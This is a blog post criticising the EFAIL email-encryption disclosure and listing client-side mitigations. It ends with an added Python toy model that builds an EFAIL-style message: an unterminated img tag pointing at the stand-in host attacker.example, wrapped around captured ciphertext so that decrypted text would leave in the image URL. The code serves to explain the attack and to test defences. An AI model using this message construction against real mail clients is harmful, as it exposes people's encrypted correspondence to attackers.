My thoughts on the EFAIL “vulnerability” with PGP, S/MIME, etcetera…

This has to do with improper handling of HTML emails, and it is said that it could “expose plain text”.  The “attacker” starts from an encrypted message they have already captured (one they cannot read themselves) and wraps it in a multipart MIME message of their own: an HTML part that opens an image tag whose source URL points at the attacker’s server and is left unterminated, then the captured ciphertext, then a part that closes the tag.  When a mail client which improperly handles such messages decrypts the ciphertext automatically and renders all the parts as one HTML document, the decrypted text ends up inside that URL, and the client sends it to the attacker’s server when it goes to load the image.

In other words, the attacker cannot read the plaintext on their own; they need your mail client to decrypt it and then hand it back to them.  And, apparently, the underlying mishandling is an “old bug”.  So why all the cloak and dagger?  I am not entirely sure, but I have a suspicion that some “security researchers” are almost “more in it for the prestige” than they are in it to actually provide genuine help to people.

The “security research team” announced this with a promise of “more in 2 days when we release our paper”.  They released a “pre-release” version to the EFF, who (in my opinion) jumped the gun and said that there was good reason to stop using these tools entirely, and that you should use a centralized tool instead.

The “research team” had no reason to disclose that they would be “releasing a full paper” in the public manner that they did.  At least, I see no evidence that the threat was really so *severe* that it was justified.

Further, I don’t know that the EFF really did *any* due diligence to make sure that the disclosed “flaw” was one that posed a severe security threat.

So, what’s in it for the EFF, and for the security research team?  I can’t quite see what is in it for the EFF, but the security research team gets another notch in their belt for being “appropriate corporate citizens.”  But the fact is, what *they* did was entirely inappropriate, as they spread a bunch of “fear, uncertainty and doubt” (FUD) which they have *refused* to talk to anyone publicly about.  This may also be true of past behaviours.

Essentially, the attacker composes an email around a ciphertext they already hold, and your mail client reads it back to them when you open the message.  Even with automatic decryption turned off, a client that still renders the attacker’s HTML and fetches the remote image tells the attacker *when* you read their message; that read-receipt is the *possible* leakage that remains (assuming this isn’t patched).  For the plaintext itself to leak, about 4 *different* things have to go wrong in your mail software at once: it decrypts without asking, it renders HTML, it loads remote content without asking, and it splices the decrypted part into the same document as the attacker’s HTML.  “Deleting” or “disabling” these tools is not warranted.  There *are* mitigations, which the coverage largely skipped over, that should be available to pretty much anyone who uses PGP or its variants:

  1. Disable automatic decryption of encrypted emails, so nothing is decrypted until you ask for it.
  2. Disable automatic rendering of HTML in emails (and with it the loading of remote images and other content).

Both of these options should be available to anyone who is using PGP or its variants, and to the best of my knowledge they are the recommended settings.
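To make the mechanics concrete, here is a toy model of the message shape described above together with a simplified mail-client display pipeline, so you can see which of the two settings above stops which leak.  This is an added example, not code from the original post or from the EFAIL researchers.  Its assumptions: the “encryption” is a base64 stand-in for a real PGP or S/MIME ciphertext that the attacker captured but cannot read, the content type application/x-toy-encrypted and the host attacker.example are made up for the demo, and render() is a model of how a careless client behaves, not any real client’s code.

```python
"""Toy model of an EFAIL-style direct-exfiltration message and of the client
settings that decide what leaks.  Added example, not from the original post or
the EFAIL researchers.  Assumptions: the "encryption" is a base64 stand-in for
a real PGP/S/MIME blob the attacker captured but cannot read; the content type
application/x-toy-encrypted and the host attacker.example are made up."""
import base64
import re
from dataclasses import dataclass, field
from email import message_from_bytes
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from urllib.parse import quote

ATTACKER_HOST = "attacker.example"   # hypothetical collection server
TOY_SUBTYPE = "x-toy-encrypted"      # stand-in for pgp-encrypted / pkcs7-mime


def toy_encrypt(plaintext: str) -> bytes:
    """Stand-in for the ciphertext the attacker captured earlier."""
    return base64.b64encode(plaintext.encode())


def toy_decrypt(blob: bytes) -> str:
    """Stand-in for the victim's client decrypting with the victim's key."""
    return base64.b64decode(blob).decode()


def build_efail_message(captured_ciphertext: bytes) -> bytes:
    """Attacker's wrapper: an HTML part that opens <img src="..."> and leaves the
    URL unterminated, the captured ciphertext, then a part that closes the tag."""
    outer = MIMEMultipart("mixed")
    outer["From"] = f"attacker@{ATTACKER_HOST}"
    outer["To"] = "victim@example.org"
    outer["Subject"] = "Fwd: (constructed example)"
    outer.attach(MIMEText(f'<img src="http://{ATTACKER_HOST}/', "html"))
    outer.attach(MIMEApplication(captured_ciphertext, TOY_SUBTYPE))
    outer.attach(MIMEText('">', "html"))
    return outer.as_bytes()


IMG_SRC = re.compile(r'<img\s+src="([^"]*)"', re.IGNORECASE)


@dataclass
class Rendering:
    document: str                                     # what the display engine sees
    fetched_urls: list = field(default_factory=list)  # remote requests it would make


def render(raw: bytes, *, auto_decrypt: bool, render_html: bool,
           isolate_parts: bool = False) -> Rendering:
    """Simplified model of a mail client's display pipeline.

    auto_decrypt   decrypt encrypted parts without asking (mitigation 1 off)
    render_html    parse HTML and load remote images     (mitigation 2 off)
    isolate_parts  render every MIME part as its own document, so attacker
                   HTML can never wrap the decrypted text (the client-side fix)
    """
    msg = message_from_bytes(raw)
    bodies = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True)
        if part.get_content_type() == f"application/{TOY_SUBTYPE}":
            bodies.append(toy_decrypt(payload) if auto_decrypt
                          else "[encrypted part: not decrypted automatically]")
        else:
            bodies.append(payload.decode(part.get_content_charset() or "ascii"))

    if not render_html:
        # Plain-text display: no HTML parser runs, so nothing is fetched.
        return Rendering(document="\n".join(bodies))

    documents = bodies if isolate_parts else ["".join(bodies)]
    # A real engine percent-encodes the URL before requesting it.
    fetched = [quote(url, safe=":/")
               for doc in documents for url in IMG_SRC.findall(doc)]
    return Rendering(document="\n".join(documents), fetched_urls=fetched)


def leaks_plaintext(plaintext: str, **client_settings) -> bool:
    """True when a request carrying the victim's plaintext would reach the attacker."""
    raw = build_efail_message(toy_encrypt(plaintext))
    encoded = quote(plaintext, safe=":/")
    return any(encoded in url for url in render(raw, **client_settings).fetched_urls)


if __name__ == "__main__":
    secret = "The password is hunter2"            # constructed victim plaintext
    raw = build_efail_message(toy_encrypt(secret))
    for settings in ({"auto_decrypt": True, "render_html": True},
                     {"auto_decrypt": False, "render_html": True},
                     {"auto_decrypt": True, "render_html": False},
                     {"auto_decrypt": True, "render_html": True, "isolate_parts": True}):
        result = render(raw, **settings)
        print(settings, "->", result.fetched_urls or "no remote request")
```

Running it walks through four client configurations: with automatic decryption and HTML rendering both on, the request the client would make carries the plaintext in the URL; turning off automatic decryption alone still sends a request to the attacker’s host (the “they can tell when you read it” leakage, but no plaintext); turning off HTML rendering sends nothing at all; and a client that renders each MIME part in isolation does not leak even with both features left on, which is why that is the fix clients themselves need.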

This entry was posted in Computer Security, Internet Security.